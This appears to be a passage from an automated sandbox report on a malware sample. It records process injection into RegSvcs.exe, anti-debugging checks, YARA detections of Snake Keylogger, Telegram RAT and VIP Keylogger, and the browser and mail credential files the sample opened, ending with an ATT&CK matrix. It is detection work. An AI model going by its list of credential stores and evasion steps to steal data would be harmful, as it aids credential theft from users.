                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                    Source: C:\Users\user\Desktop\z1newpo.exeAPI call chain: ExitProcess graph end nodegraph_0-86659
                    Source: C:\Users\user\AppData\Local\directory\name.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06039548 LdrInitializeThunk,3_2_06039548
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0426D500 mov eax, dword ptr fs:[00000030h]0_2_0426D500
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0426D560 mov eax, dword ptr fs:[00000030h]0_2_0426D560
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0426BEC0 mov eax, dword ptr fs:[00000030h]0_2_0426BEC0
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0411F4C0 mov eax, dword ptr fs:[00000030h]2_2_0411F4C0
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0411F520 mov eax, dword ptr fs:[00000030h]2_2_0411F520
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0411DE80 mov eax, dword ptr fs:[00000030h]2_2_0411DE80
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_041D82D8 mov eax, dword ptr fs:[00000030h]12_2_041D82D8
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_041D9918 mov eax, dword ptr fs:[00000030h]12_2_041D9918
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_041D9978 mov eax, dword ptr fs:[00000030h]12_2_041D9978
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0041F250 SetUnhandledExceptionFilter,2_2_0041F250
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041A208
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00417DAA
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0041F250 SetUnhandledExceptionFilter,12_2_0041F250
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0041A208
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00417DAA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 485008Jump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 499008Jump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z1newpo.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
                    Source: name.exeBinary or memory string: Shell_TrayWnd
                    Source: z1newpo.exe, name.exe.0.drBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                    Source: C:\Users\user\Desktop\z1newpo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: name.exe PID: 788, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3636, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: name.exe PID: 6540, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6480, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3688609885.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.3689181352.0000000002823000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: name.exe PID: 788, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3636, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: name.exe PID: 6540, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: name.exeBinary or memory string: WIN_XP
                    Source: name.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                    Source: name.exeBinary or memory string: WIN_XPe
                    Source: name.exeBinary or memory string: WIN_VISTA
                    Source: name.exeBinary or memory string: WIN_7
                    Source: name.exeBinary or memory string: WIN_8
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3684808762.00000000003AD000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: name.exe PID: 788, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3636, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: name.exe PID: 6540, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6480, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: name.exe PID: 788, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3636, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: name.exe PID: 6540, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6480, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3688609885.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.3689181352.0000000002823000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: name.exe PID: 788, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3636, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: name.exe PID: 6540, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_004652BE
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00476619
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,2_2_0046CEF3
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,12_2_004652BE
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_00476619
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,12_2_0046CEF3

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		2
                    Valid Accounts                    		2
                    Native API                    		111
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Web Service                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		4
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt2
                    Valid Accounts                    		2
                    Valid Accounts                    		3
                    Obfuscated Files or Information                    		Security Account Manager2
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		11
                    Encrypted Channel                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder                    		21
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		NTDS117
                    System Information Discovery                    		Distributed Component Object Model21
                    Input Capture                    		1
                    Non-Standard Port                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection                    		11
                    Masquerading                    		LSA Secrets221
                    Security Software Discovery                    		SSH3
                    Clipboard Data                    		3
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                    Registry Run Keys / Startup Folder                    		2
                    Valid Accounts                    		Cached Domain Credentials11
